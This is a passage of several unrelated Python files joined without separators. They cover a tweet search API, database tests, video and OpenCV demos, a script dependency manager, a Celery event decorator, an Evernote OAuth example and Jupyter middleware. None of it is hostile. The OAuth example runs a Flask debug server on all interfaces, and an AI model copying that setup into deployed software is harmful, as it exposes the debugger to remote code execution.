type(args["sort"]) == str: args["sort"] = [args["sort"]] return { "total": db.tweets.count_documents(params), "results": list( db.tweets.find(params) .sort("like_count", -1) .skip((args["page"] or 0) * 25) .limit(25) ), "archives": { a["_id"]: a["count"] for a in db.tweets.aggregate( [ {"$match": params}, {"$unwind": "$_archive"}, {"$group": {"_id": "$_archive", "count": {"$sum": 1}}}, {"$sort": {"count": -1}}, {"$limit": 50}, ] ) }, "languages": { a["_id"]: a["count"] for a in db.tweets.aggregate( [ {"$match": params}, {"$unwind": "$tweet_language"}, {"$group": {"_id": "$tweet_language", "count": {"$sum": 1}}}, {"$sort": {"count": -1}}, {"$limit": 50}, ] ) }, "hashtags": { a["_id"]: a["count"] for a in db.tweets.aggregate( [ {"$match": params}, {"$unwind": "$hashtags"}, {"$group": {"_id": "$hashtags", "count": {"$sum": 1}}}, {"$sort": {"count": -1}}, {"$limit": 50}, ] ) }, } class StatsResource(Resource): def get(self): # total # of tweets # names & counts of each archive # last updated # eventually: aggregate stats (averages, etc) return { "total_tweets": db.tweets.estimated_document_count(), "archives": db.tweets.distinct("_archive"), "languages": [ lang for lang in db.tweets.distinct("tweet_language") if lang.strip() != "" ], } api.add_resource(StatsResource, "/") api.add_resource(SearchResource, "/search") @app.after_request def add_header(response): response.cache_control.max_age = 24*60*60 return response if __name__ == "__main__": app.run(debug=os.getenv("DEBUG", "False") == "True") from django.db import models class UserSettings(SkeletonU): user = models.ForeignKey(User) key = models.CharField(_('Key'), max_length=50, null=False, blank=False, db_index=True) value = models.CharField(_('Value'), max_length=50) __unicode__ = lambda self: u'%s = %s' % (self.key, self.value) #!/usr/bin/env python # # Public Domain 2014-present MongoDB, Inc. # Public Domain 2008-2014 WiredTiger, Inc. # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # test_timestamp19.py # Use the oldest timestamp in the metadata as the oldest timestamp on restart. import wttest from wtdataset import SimpleDataSet from wtscenario import make_scenarios class test_timestamp19(wttest.WiredTigerTestCase): conn_config = 'cache_size=50MB' format_values = [ ('integer-row', dict(key_format='i', value_format='S')), ('column', dict(key_format='r', value_format='S')), ('column-fix', dict(key_format='r', value_format='8t')), ] scenarios = make_scenarios(format_values) def updates(self, uri, value, ds, nrows, commit_ts): session = self.session cursor = session.open_cursor(uri) for i in range(1, nrows + 1): session.begin_transaction() cursor[ds.key(i)] = value session.commit_transaction('commit_timestamp=' + self.timestamp_str(commit_ts)) cursor.close() def test_timestamp(self): uri = "table:test_timestamp19" create_params = 'key_format={},value_format={}'.format(self.key_format, self.value_format) self.session.create(uri, create_params) ds = SimpleDataSet(self, uri, 0, key_format=self.key_format, value_format="S") ds.populate() nrows = 1000 if self.value_format == '8t': value_x = 120 # 'x' value_y = 121 # 'y' value_z = 122 # 'z' else: value_x = 'x' * 1000 value_y = 'y' * 1000 value_z = 'z' * 1000 # Set the oldest and stable timestamps to 10. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(10) + ', stable_timestamp=' + self.timestamp_str(10)) # Insert values with varying timestamps. self.updates(uri, value_x, ds, nrows, 20) self.updates(uri, value_y, ds, nrows, 30) self.updates(uri, value_z, ds, nrows, 40) # Perform a checkpoint. self.session.checkpoint('use_timestamp=true') # Move the oldest and stable timestamps to 40. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(40) + ', stable_timestamp=' + self.timestamp_str(40)) # Update values. self.updates(uri, value_z, ds, nrows, 50) self.updates(uri, value_x, ds, nrows, 60) self.updates(uri, value_y, ds, nrows, 70) # Perform a checkpoint. self.session.checkpoint('use_timestamp=true') # Close and reopen the connection. self.close_conn() self.conn = self.setUpConnectionOpen('.') self.session = self.setUpSessionOpen(self.conn) # The oldest timestamp on recovery is 40. Trying to set it earlier is a no-op. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(10)) self.assertTimestampsEqual(\ self.conn.query_timestamp('get=oldest_timestamp'), self.timestamp_str(40)) # Move the oldest and stable timestamps to 70. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(70) + ', stable_timestamp=' + self.timestamp_str(70)) self.assertTimestampsEqual(\ self.conn.query_timestamp('get=oldest_timestamp'), self.timestamp_str(70)) self.assertTimestampsEqual(\ self.conn.query_timestamp('get=stable_timestamp'), self.timestamp_str(70)) if __name__ == '__main__': wttest.run() # -*- coding: utf-8 -*- r""" The package is mainly organized around two class hierarchies: the functions and the solvers. Instantiated functions represent convex functions to optimize. Instantiated solvers represent solving algorithms. The :func:`pyunlocbox.solvers.solve` solving function takes as parameters a solver object and some function objects to actually solve the optimization problem. See this function's documentation for a typical usage example. The :mod:`pyunlocbox` package is divided into the following modules: * :mod:`.functions`: objective functions to define an optimization problem, * :mod:`.solvers`: the main solving function and common solvers, * :mod:`.acceleration`: general acceleration schemes for various solvers, * :mod:`.operators`: some operators. """ # When importing the toolbox, you surely want these modules. from pyunlocbox import functions from pyunlocbox import solvers from pyunlocbox import operators from pyunlocbox import acceleration # Silence the code checker warning about unused symbols. assert functions assert solvers assert operators assert acceleration __version__ = '0.5.2' __release_date__ = '2017-12-15' # Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar. Consider U$1.00 = R$3.27. micro-fan/aiozk import asyncio import os import uuid from aiozk import ZKClient, exc # noqa from aiozk.states import States import pytest HOST = os.environ.get('ZK_HOST', 'zk') @pytest.fixture def servers(): return HOST def get_client(): return ZKClient(HOST, chroot='/test_aiozk') async def get_tree(client, curr='/'): out = [curr, ] children = await client.get_children(curr) for c in children: # eliminate double slash: //root = '/'.join('/', 'root') if curr == '/': curr = '' out.extend(await get_tree(client, '/'.join([curr, c]))) return out async def dump_tree(client, base='/'): out = list(await get_tree(client, base)) print(f'Tree dump: {out}') return out @pytest.fixture def path(): yield f'/{uuid.uuid4().hex}' @pytest.fixture async def zk(): c = get_client() await c.start() if len(await c.get_children('/')): await c.deleteall('') await c.create('') yield c try: await c.delete('/') except exc.NotEmpty: await dump_tree(c) await c.deleteall('') raise await c.close() @pytest.fixture async def zk2(): c = get_client() await c.start() yield c await c.close() @pytest.fixture def zk_disruptor(zk): """ Force zk reconnect """ async def _force_reconnect(): conn = zk.session.conn await asyncio.sleep(0.2) await zk.session.ensure_safe_state() await conn.close(1) lost = [States.SUSPENDED, States.LOST] await zk.session.state.wait_for(*lost) await zk.session.ensure_safe_state() yield _force_reconnect 0 """ Description of the video: Mimic of Star Wars' opening title. A text with a (false) perspective effect goes towards the end of space, on a background made of stars. Slight fading effect on the text. """ import numpy as np from moviepy.editor import * from moviepy.video.tools.drawing import color_gradient from skimage import transform as tf # RESOLUTION w = 720 h = w * 9 / 16 # 16/9 screen moviesize = w, h # THE RAW TEXT txt = "\n".join( [ "A long time ago, in a faraway galaxy,", "there lived a prince and a princess", "who had never seen the stars, for they", "lived deep underground.", "", "Many years before, the prince's", "grandfather had ventured out to the", "surface and had been burnt to ashes by", "solar winds.", "", "One day, as the princess was coding", "and the prince was shopping online, a", "meteor landed just a few megameters", "from the couple's flat.", ] ) # Add blanks txt = 10 * "\n" + txt + 10 * "\n" # CREATE THE TEXT IMAGE clip_txt = TextClip( txt, color="white", align="West", fontsize=25, font="Xolonium-Bold", method="label" ) # SCROLL THE TEXT IMAGE BY CROPPING A MOVING AREA txt_speed = 27 fl = lambda gf, t: gf(t)[int(txt_speed * t) : int(txt_speed * t) + h, :] moving_txt = clip_txt.fl(fl, apply_to=["mask"]) # ADD A VANISHING EFFECT ON THE TEXT WITH A GRADIENT MASK grad = color_gradient( moving_txt.size, p1=(0, 2 * h / 3), p2=(0, h / 4), col1=0.0, col2=1.0 ) gradmask = ImageClip(grad, ismask=True) fl = lambda pic: np.minimum(pic, gradmask.img) moving_txt.mask = moving_txt.mask.fl_image(fl) # WARP THE TEXT INTO A TRAPEZOID (PERSPECTIVE EFFECT) def trapzWarp(pic, cx, cy, ismask=False): """ Complicated function (will be latex packaged as a fx) """ Y, X = pic.shape[:2] src = np.array([[0, 0], [X, 0], [X, Y], [0, Y]]) dst = np.array([[cx * X, cy * Y], [(1 - cx) * X, cy * Y], [X, Y], [0, Y]]) tform = tf.ProjectiveTransform() tform.estimate(src, dst) im = tf.warp(pic, tform.inverse, output_shape=(Y, X)) return im if ismask else (im * 255).astype("uint8") fl_im = lambda pic: trapzWarp(pic, 0.2, 0.3) fl_mask = lambda pic: trapzWarp(pic, 0.2, 0.3, ismask=True) warped_txt = moving_txt.fl_image(fl_im) warped_txt.mask = warped_txt.mask.fl_image(fl_mask) # BACKGROUND IMAGE, DARKENED AT 60% stars = ImageClip("../../videos/stars.jpg") stars_darkened = stars.fl_image(lambda pic: (0.6 * pic).astype("int16")) # COMPOSE THE MOVIE final = CompositeVideoClip( [stars_darkened, warped_txt.set_pos(("center", "bottom"))], size=moviesize ) # WRITE TO A FILE final.set_duration(8).write_videofile("starworms.avi", fps=5) # This script is heavy (30s of computations to render 8s of video) """===================================================================== CODE FOR THE VIDEO TUTORIAL We will now code the video tutorial for this video. When you think about it, it is a code for a video explaining how to make another video using some code (this is so meta!). This code uses the variables of the previous code (it should be placed after that previous code to work). =====================================================================""" def annotate(clip, txt, txt_color="white", bg_color=(0, 0, 255)): """ Writes a text at the bottom of the clip. """ txtclip = TextClip(txt, fontsize=20, font="Ubuntu-bold", color=txt_color) txtclip = txtclip.on_color( (clip.w, txtclip.h + 6), color=(0, 0, 255), pos=(6, "center") ) cvc = CompositeVideoClip([clip, txtclip.set_pos((0, "bottom"))]) return cvc.set_duration(clip.duration) def resizeCenter(clip): return clip.resize(height=h).set_pos("center") def composeCenter(clip): return CompositeVideoClip([clip.set_pos("center")], size=moviesize) annotated_clips = [ annotate(clip, text) for clip, text in [ ( composeCenter(resizeCenter(stars)).subclip(0, 3), "This is a public domain picture of stars", ), ( CompositeVideoClip([stars], moviesize).subclip(0, 3), "We only keep one part.", ), ( CompositeVideoClip([stars_darkened], moviesize).subclip(0, 3), "We darken it a little.", ), ( composeCenter(resizeCenter(clip_txt)).subclip(0, 3), "We generate a text image.", ), ( composeCenter(moving_txt.set_mask(None)).subclip(6, 9), "We scroll the text by cropping a moving region of it.", ), ( composeCenter(gradmask.to_RGB()).subclip(0, 2), "We add this mask to the clip.", ), (composeCenter(moving_txt).subclip(6, 9), "Here is the result"), ( composeCenter(warped_txt).subclip(6, 9), "We now warp this clip in a trapezoid.", ), (final.subclip(6, 9), "We finally superimpose with the stars."), ] ] # Concatenate and write to a file concatenate_videoclips(annotated_clips).write_videofile("tutorial.avi", fps=5) #!/usr/bin/env python3 #deps: docopt pathlib """Manuscript. Manage your scripts and their dependencies. Just add a line of the form "#deps: requests docopt pathlib" to your script, and manuscript will install them in a virtualenv and create a wrapper. Usage: manuscript install SCRIPT [-e ENV -i INTERPRETER -c] manuscript check-deps Options: -e ENV The name of the virtualenv to use -i INTERPRETER Specify the interpreter to use, otherwise, it's guessed from the script's shebang. -c Copy the script so the original can be deleted """ import os import sys import subprocess import shutil from pathlib import Path from docopt import docopt MANUSCRIPT_DIR = Path(os.path.expanduser('~'), '.manuscript') ENVS_DIR = MANUSCRIPT_DIR / 'envs' BIN_DIR = MANUSCRIPT_DIR / 'bin' COPIES_DIR = MANUSCRIPT_DIR / 'script_copies' def initialize(): """Checks that everything that should exist exists""" subprocess.check_output(['virtualenv', '--version']) for path in (MANUSCRIPT_DIR, ENVS_DIR, BIN_DIR, COPIES_DIR): if not path.exists(): path.mkdir() class Env: """One of the virtualenv manipulated by manuscript""" def __init__(self, name): """Creates a virtualenv with the given name.""" self.name = name if name.startswith('workon:'): try: workon_dir = Path(os.environ['WORKON_HOME']) except KeyError: print("'WORKON_HOME' environment variable not found, cannot " "use virtualenv-wrapper env.") sys.exit(-1) self.dir = workon_dir / name[len('workon:'):] else: self.dir = ENVS_DIR / name def created(self): return self.dir.exists() def ensure_created(self, interpreter): """Ensures the env in created. If not, create it with interpreter""" if not self.created(): if self.name.startswith('workon:'): print('Cannot create virtualenv-wrapper env, please create it ' 'yourself with "mkvirtualenv {}"' .format(self.name[len('workon:'):])) sys.exit(-1) subprocess.check_call(['virtualenv', '-p', interpreter, str(self.dir)]) def bin_path(self, bin): """Returns the path to a bin in the env""" return self.dir / 'bin' / bin def install(self, pkgs): """Install the given packages in the env""" if pkgs: subprocess.check_call([str(self.bin_path('pip')), 'install'] + pkgs) def default_env(interpreter): """Returns the default env for an interpreter""" name = 'default-{}'.format(interpreter) env = Env(name) env.ensure_created(interpreter) return env SCRIPT_TEMPLATE = """#!/bin/sh INTERPRETER={} FILE={} $INTERPRETER $FILE $* """ class Script: """One of the scripts manipulated by manuscript""" def __init__(self, script, env, copy=False): """Creates a script attached to the given environment. If copy if True, first copy this script instead of just linking it""" self.path = Path(script).resolve() self.name = self.path.name self.env = env if copy: shutil.copy(str(self.path), str(COPIES_DIR)) print('Copied {} to {}'.format(self.path, COPIES_DIR)) self.path = COPIES_DIR / self.name if self.name.endswith('.py'): self.name = self.name[:-3] def dependencies(self): """Looks for dependencies of the form "#deps: ..." in the script""" with self.path.open() as f: for line in f: if line.startswith('#deps:'): line = line.replace('#deps:', '').strip() return line.split(' ') return [] def install_deps(self): """Install the dependencies of the script""" self.env.install(self.dependencies()) def save(self): """Save the script in manuscript's bin dir""" self.install_deps() file = BIN_DIR / self.name with file.open('w') as f: f.write(SCRIPT_TEMPLATE.format(self.env.bin_path('python'), repr(str(self.path)))) subprocess.check_call(['chmod', '+x', str(file)]) print('Created {}'.format(file)) def interpreter_from_shebang(script): """Tries to guess the interpreter to use from the shebang of the script. Returns None if none is found.""" with open(script) as f: line = next(f) if line.startswith('#!'): if 'env' in line: return line.strip().split('env ')[1] else: return line.strip().split('/')[-1] return None def script_without_specific_env(script_file, interpreter, copy): """Returns a Script created using a fefault interpreter, guess which if necessary""" interpreter = (interpreter or interpreter_from_shebang(script_file) or 'python') env = default_env(interpreter) return Script(script_file, env, copy) def all_scripts(): """Return all the scripts handled by manuscript""" for script in BIN_DIR.iterdir(): with script.open() as f: lines = f.readlines() env = Env(lines[1].split('/')[-3]) script = lines[2].split("'")[-2] yield Script(script, env) def main(): args = docopt(__doc__) initialize() if args['install']: if args['-e']: # A name is given env = Env(args['-e']) if not env.created(): interpreter = (args['-i'] or interpreter_from_shebang(args['SCRIPT']) or 'python') env.ensure_created(interpreter) elif args['-i']: print('Interpreted provided but env "{}" already ' 'exists. Ignored'.format(env.name)) script = Script(args['SCRIPT'], env, args['-c']) else: # No name, use default env script = script_without_specific_env(args['SCRIPT'], interpreter=args['-i'], copy=args['-c']) script.save() elif args['check-deps']: for script in all_scripts(): script.install_deps() if __name__ == '__main__': main() django_event/publisher/decorator.py # -*- coding: utf-8 -*- """ Core publisher client module. Basically you should use this decorator instead of manually write events into database. Decorator specifies some overridable methods if you need basic customization. Usage examples: Defining event task: :: @event(event_type='some_type', routing_strategy='') def some_task(event_request, event): argument = event_request.custom_argument return some_processed_data(event_request.data, event) And call: :: some_task.delay(EventRequest(django_request, custom_argument=123)) You can know more about .delay() or other methods in Celery docs. """ from __future__ import unicode_literals from functools import wraps from celery import task from celery import current_task from django.contrib.auth import get_user_model from django_event.publisher.exceptions import EventError class event(object): """ Main client publisher interface. Decorates function and return celery task. Automatically start and end event after celery started/completed the task. You must pass EventRequest into decorated function. :class:`EventRequest` can accept keyword arguments needed by wrapped function which are not required but django request are required by internal needs. This decorator automatically set :class:`EventRequest` and :class:`Event` instances as wrapped function arguments. Wrapped func may raise specific exception :class:`EventError` used to notify subscribers about failure. Basically this decorator will handle only that type of exceptions. Be sure you handle all raised exception in wrapped func otherwise it will pass outside decorator and into database as well. """ def __init__(self, event_type='', send_mail=False, progress_throttling=0.1, routing_strategy='', task_kwargs=None, on_start=lambda _event: None, on_success=lambda _event: None, on_error=lambda _event: None): """ :param event_type: Event type, using in message routing. :type event_type: :class:`str` :param send_mail: Send email after event is done. :type send_mail: :class:`bool` :param progress_throttling: Describes how often event will send progress messages. See :class:`Event` docs for more information about this parameter. :type progress_throttling: :class:`float` :param routing_strategy: Routing strategy e.g. what listeners will do with messages. Empty strategy means you want to deliver notification to all subscribed clients. See :class:`Event` docs for more information about this parameter. :type routing_strategy: :class:`str` :param task_kwargs: Celery task arguments. :type task_kwargs: :class:`dict` :param on_start: Event start callback. :type on_start: :class:`str` :param on_success: Event success callback. :type on_success: callable object :param on_error: Event error callback. :type on_error: callable object """ self._event_type = event_type self._send_mail = send_mail self._routing_strategy = routing_strategy self._progress_throttling = progress_throttling self._task_kwargs = task_kwargs or {} self._on_start = on_start self._on_success = on_success self._on_error = on_error self._user = None self._event_request = None self._event = None self._status = True self._result = None ############################################################################ # CORE METHODS ############################################################################ def create_event(self): """ Create event model with passing arguments. Basically you dont need to manually create event. """ from django_event.models import get_event_model event_model = get_event_model() self._event = event_model.create( progress_throttling=self._progress_throttling, routing_strategy=self._routing_strategy, user=self._user, type=self._event_type, send_mail=self._send_mail, task_id=current_task.request.id, task_name=current_task.name, event_request=self._event_request.serialize() ) self._event.save() def __call__(self, func): """ Wraps passed function into Celery :class:`Task`. :param func: Function to be wrapped. :type func: callable object :return: Celery task instance. :rtype: Celery :class:`Task` """ @task(**self._task_kwargs) @wraps(func) def wrapped(event_request): self._event_request = event_request self._user = get_user_model().objects.get( id=self._event_request.user_id) self._send_mail = self._event_request.send_mail and self._send_mail self.create_event() self.start_event() try: self._result = func(self._event_request, self._event) except EventError as e: self._result = e.message self._status = False self.complete_event() return self._result return wrapped ############################################################################ # OVERRIDABLE METHODS ############################################################################ def start_event(self): """ Starts event. Override this if you want to customize message. """ self._event.start(callback=self._on_start) def complete_event(self): """ Ends event. Override this if you want to customize message. """ self._event.complete( self._result, status=self._status, callback=self._on_success, errback=self._on_error )rdhyee/oauth-flask-examples # https://requests-oauthlib.readthedocs.org/en/latest/examples/real_world_example.html#real-example import os from flask import Flask, request, redirect, session, url_for from flask.json import jsonify # import hashlib # import binascii import evernote.edam.userstore.constants as UserStoreConstants # import evernote.edam.type.ttypes as Types from evernote.api.client import EvernoteClient EVERNOTE_CONSUMER_KEY = os.environ.get("EVERNOTE_CONSUMER_KEY") EVERNOTE_CONSUMER_SECRET = os.environ.get("EVERNOTE_CONSUMER_SECRET") EVERNOTE_PRODUCTION = os.environ.get("EVERNOTE_PRODUCTION", 'False') #default to sandbox EVERNOTE_DEV_AUTH_TOKEN = os.environ.get("EVERNOTE_DEV_AUTH_TOKEN", '') EVERNOTE_CALLBACK_URI = os.environ.get("EVERNOTE_CALLBACK_URI") SANDBOX = False if EVERNOTE_PRODUCTION == 'True' else True app = Flask(__name__) # Evernote key/secret BASE_URL = "https://www.evernote.com" if EVERNOTE_PRODUCTION == 'True' \ else "https://sandbox.evernote.com" request_token_url = '{}/oauth'.format(BASE_URL) authorization_base_url = '{}/OAuth.action'.format(BASE_URL) access_token_url = '{}/oauth'.format(BASE_URL) # https://github.com/evernote/evernote-sdk-python/blob/1.25.0/sample/django/oauth/views.py#L11 def get_evernote_client(token=None, sandbox=True): if token is not None: return EvernoteClient(token=token, sandbox=sandbox) else: return EvernoteClient( consumer_key=EVERNOTE_CONSUMER_KEY, consumer_secret=EVERNOTE_CONSUMER_SECRET, sandbox=sandbox ) @app.route("/") def demo(): """Step 1: User Authorization. Redirect the user/resource owner to the OAuth provider (i.e. Github) using an URL with a few key OAuth parameters. """ client = get_evernote_client(token=None, sandbox=SANDBOX) request_token = client.get_request_token(EVERNOTE_CALLBACK_URI) session['oauth_token'] = request_token['oauth_token'] session['oauth_token_secret'] = request_token['oauth_token_secret'] return redirect(client.get_authorize_url(request_token)) # Step 2: User authorization, this happens on the provider. @app.route("/callback", methods=["GET"]) def callback(): """ Step 3: Retrieving an access token. The user has been redirected back from the provider to your registered callback URL. With this redirection comes an authorization code included in the redirect URL. We will use that to obtain an access token. """ try: client = get_evernote_client(token=None, sandbox=SANDBOX) token = client.get_access_token( session['oauth_token'], session['oauth_token_secret'], request.args.get('oauth_verifier', '') ) session['token'] = token except Exception as e: return str(e) return redirect(url_for('.profile')) @app.route("/profile", methods=["GET"]) def profile(): """Fetching a protected resource using an OAuth 1 token. """ token = session['token'] client = get_evernote_client(token=token, sandbox=SANDBOX) user_store = client.get_user_store() version_ok = user_store.checkVersion( "Evernote EDAMTest (Python)", UserStoreConstants.EDAM_VERSION_MAJOR, UserStoreConstants.EDAM_VERSION_MINOR ) note_store = client.get_note_store() # List all of the notebooks in the user's account notebooks = note_store.listNotebooks() return "
" .join([notebook.name for notebook in notebooks]) if __name__ == "__main__": # This allows us to use a plain HTTP callback os.environ['DEBUG'] = "1" app.secret_key = os.urandom(24) app.run(host="0.0.0.0", port=5000, debug=True) vladiant/OpenCVMLsamples # https://github.com/methylDragon/opencv-python-reference/blob/master/04%20OpenCV%20Machine%20Learning%20and%20AI%20Detectors.md # Source: https://docs.opencv.org/3.4.4/d5/d26/tutorial_py_knn_understanding.html # help(cv.FUNCTION_YOU_NEED_HELP_WITH) import cv2 as cv import numpy as np SZ = 20 # Size bin_n = 16 # Number of bins affine_flags = cv.WARP_INVERSE_MAP | cv.INTER_LINEAR def deskew(img): m = cv.moments(img) if abs(m["mu02"]) < 1e-2: return img.copy() skew = m["mu11"] / m["mu02"] M = np.float32([[1, skew, -0.5 * SZ * skew], [0, 1, 0]]) img = cv.warpAffine(img, M, (SZ, SZ), flags=affine_flags) return img def hog(img): gx = cv.Sobel(img, cv.CV_32F, 1, 0) gy = cv.Sobel(img, cv.CV_32F, 0, 1) mag, ang = cv.cartToPolar(gx, gy) bins = np.int32(bin_n * ang / (2 * np.pi)) # quantizing binvalues in (0...16) bin_cells = bins[:10, :10], bins[10:, :10], bins[:10, 10:], bins[10:, 10:] mag_cells = mag[:10, :10], mag[10:, :10], mag[:10, 10:], mag[10:, 10:] hists = [ np.bincount(b.ravel(), m.ravel(), bin_n) for b, m in zip(bin_cells, mag_cells) ] hist = np.hstack(hists) # hist is a 64 bit vector return hist img = cv.imread("5000_digits.png", 0) if img is None: raise Exception("we need the 5000_digits.png image from samples/data here !") cells = [np.hsplit(row, 100) for row in np.vsplit(img, 50)] # First half is trainData, remaining is testData train_cells = [i[:50] for i in cells] test_cells = [i[50:] for i in cells] deskewed = [list(map(deskew, row)) for row in train_cells] hogdata = [list(map(hog, row)) for row in deskewed] trainData = np.float32(hogdata).reshape(-1, 64) responses = np.repeat(np.arange(10), 250)[:, np.newaxis] svm = cv.ml.SVM_create() svm.setKernel(cv.ml.SVM_LINEAR) svm.setType(cv.ml.SVM_C_SVC) svm.setC(2.67) svm.setGamma(5.383) svm.train(trainData, cv.ml.ROW_SAMPLE, responses) print("Save trained model data as svm_data.dat") svm.save("svm_data.dat") deskewed = [list(map(deskew, row)) for row in test_cells] hogdata = [list(map(hog, row)) for row in deskewed] testData = np.float32(hogdata).reshape(-1, bin_n * 4) result = svm.predict(testData)[1] mask = result == responses correct = np.count_nonzero(mask) accuracy = correct * 100.0 / result.size print(f"accuracy: {accuracy}") pbasting/cactussrc/cactus/preprocessor/allTests.py1-10 #!/usr/bin/env python #Copyright (C) 2011 by # #Released under the MIT license, see LICENSE.txt import unittest from cactus.preprocessor.lastzRepeatMasking.cactus_lastzRepeatMaskTest import TestCase as repeatMaskTest from cactus.preprocessor.cactus_preprocessorTest import TestCase as preprocessorTest def allSuites(): allTests = unittest.TestSuite((unittest.makeSuite(repeatMaskTest, 'test'), unittest.makeSuite(preprocessorTest, 'test'))) return allTests def main(): suite = allSuites() runner = unittest.TextTestRunner() i = runner.run(suite) return len(i.failures) + len(i.errors) if __name__ == '__main__': import sys sys.exit(main()) FunkyKoki/Separable-Batch-Normalization-for-Robust-Facial-Landmark-Localization cropSize = 128 # network input image size sigma = 1. # Gaussian blur param tau = 0.2 # salt and pepper Noise param eta = 0.4 # color jetting param gamma = 0.5 # occlusion param alpha = 0.15 # bounding box perturbation param theta = 25. # image rotation param beta = 0.3 # shear transform param kptNum = 98 datasetSize = {'train':7500, 'test':2500, 'largepose':326, 'expression':314, 'blur':773, 'illumination':698, 'makeup':206, 'occlusion':736, 'all':10000 } flipRelation = [ [0, 32], [1, 31], [2, 30], [3, 29], [4, 28], [5, 27], [6, 26], [7, 25], [8, 24], [9, 23], [10, 22], [11, 21], [12, 20], [13, 19], [14, 18], [15, 17], [16, 16], [17, 15], [18, 14], [19, 13], [20, 12], [21, 11], [22, 10], [23, 9], [24, 8], [25, 7], [26, 6], [27, 5], [28, 4], [29, 3], [30, 2], [31, 1], [32, 0], [33, 46], [34, 45], [35, 44], [36, 43], [37, 42], [38, 50], [39, 49], [40, 48], [41, 47], [42, 37], [43, 36], [44, 35], [45, 34], [46, 33], [47, 41], [48, 40], [49, 39], [50, 38], [51, 51], [52, 52], [53, 53], [54, 54], [55, 59], [56, 58], [57, 57], [58, 56], [59, 55], [60, 72], [61, 71], [62, 70], [63, 69], [64, 68], [65, 75], [66, 74], [67, 73], [68, 64], [69, 63], [70, 62], [71, 61], [72, 60], [73, 67], [74, 66], [75, 65], [76, 82], [77, 81], [78, 80], [79, 79], [80, 78], [81, 77], [82, 76], [83, 87], [84, 86], [85, 85], [86, 84], [87, 83], [88, 92], [89, 91], [90, 90], [91, 89], [92, 88], [93, 95], [94, 94], [95, 93], [96, 97], [97, 96] ] """Tests for feeds utility.""" import unittest import feeds import xml.dom.minidom class FeedsTestCase(unittest.TestCase): def testHub(self): feed = xml.dom.minidom.parseString(open('feedstest.xml').read()) hub = feeds.get_hub(feed.getElementsByTagName('feed')[0]) # This should be the hub for the given feed. self.assertEqual(hub, 'http://pubsubhubbub.appspot.com/') def testSelf(self): feed = xml.dom.minidom.parseString(open('feedstest.xml').read()) self_href = feeds.get_self(feed.getElementsByTagName('feed')[0]) # This should be the hub for the given feed. self.assertEqual(self_href, 'http://feeds.feedburner.com/blogspot/MKuf') if __name__ == '__main__': unittest.main() ''' Middleware server to make Jupyter API messages nicer to deal with in Neos. When Neos gets better at parsing JSON, this may not be necessary, and should be removed for the real-time messages of nepcomm anyway, to reduce latency! see nepcomm for placeholder We can keep this for dealing with the less frequent Jupyter messages which are not dealing with real-time interactivity things like execute_requests, error responses, stdout, opening notebooks, etc. I think there are also some APIs in the ipywidgets library that are designed for some of the stuff we do here. But well, the way we are doing works well so welp. ''' import asyncio import websockets import requests import nest_asyncio nest_asyncio.apply() import uuid, datetime import json import time def send_execute_request(code,session_id=None): session_id = uuid.uuid1().hex if session_id is None else session_id msg_type = 'execute_request' id=uuid.uuid1().hex content = { 'code' : code, 'silent':False } hdr = { 'msg_id' : id, 'username': 'username', 'session': session_id, 'data': datetime.datetime.now().isoformat(), 'msg_type': msg_type, 'version' : '5.3' } msg = { 'header': hdr, 'msg_id': id, 'parent_header': hdr, 'metadata': {}, 'channel': 'shell', 'content': content } return msg def send_kernel_interrupt(session_id=None): session_id = uuid.uuid1().hex if session_id is None else session_id msg_type = 'kernel_interrupt' id=uuid.uuid1().hex hdr = { 'msg_id' : id, 'username': 'username', 'session': session_id, 'data': datetime.datetime.now().isoformat(), 'msg_type': msg_type, 'version' : '5.3' } msg = { 'header': hdr, 'msg_id': id, 'parent_header': hdr, 'metadata': {}, 'channel': 'shell', 'content': {} } return msg def send_comm(data,comm_id,session_id): msg_type = 'comm_msg' id=uuid.uuid1().hex hdr = { 'msg_id' : id, 'username': 'username', 'session': session_id, 'data': datetime.datetime.now().isoformat(), 'msg_type': msg_type, 'version' : '5.3' } content = {'comm_id': comm_id, 'data': data } msg = { 'header': hdr, 'msg_id': id, 'parent_header': hdr, 'metadata': {}, 'buffers':[], 'channel':"shell", 'content': content } return msg def main(kernel_id,headers,comm_id): async def loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids): while 1: print("awaiting jupyter response") response = await websocket.recv() # print(response) response = json.loads(response) session_ids[0] = response["header"]["session"] if response["msg_type"] == "comm_msg": if parent_msg_id in neos_cell_msg_ids: cellid = neos_cell_msg_ids[parent_msg_id] else: cellid="0" msg = response["content"]["data"] i = msg.index("/") # print("HIIIIIIIIIIIII",i) if i == -1: await neossocket.send(str(msg)) else: message_type = msg[:i] if message_type == "media": media_url = msg[i+1:] await neossocket.send("media/"+cellid+"/"+media_url) else: await neossocket.send(str(msg)) else: try: parent_msg_id = response["parent_header"]["msg_id"] if parent_msg_id in neos_cell_msg_ids: cellid = neos_cell_msg_ids[parent_msg_id] else: cellid="0" if response["msg_type"] == "stream": await neossocket.send("cell/"+cellid+"/"+response["content"]["text"]) if response["msg_type"] == "error": await neossocket.send("cell/"+cellid+"/"+""+response["content"]["ename"]+": "+response["content"]["evalue"]+"") elif response["msg_type"] == "execute_result": await neossocket.send("cell/"+cellid+"/"+response["content"]["data"]["text/plain"]) #TODO: treat execute_response differently too elif response["msg_type"] == "status": if 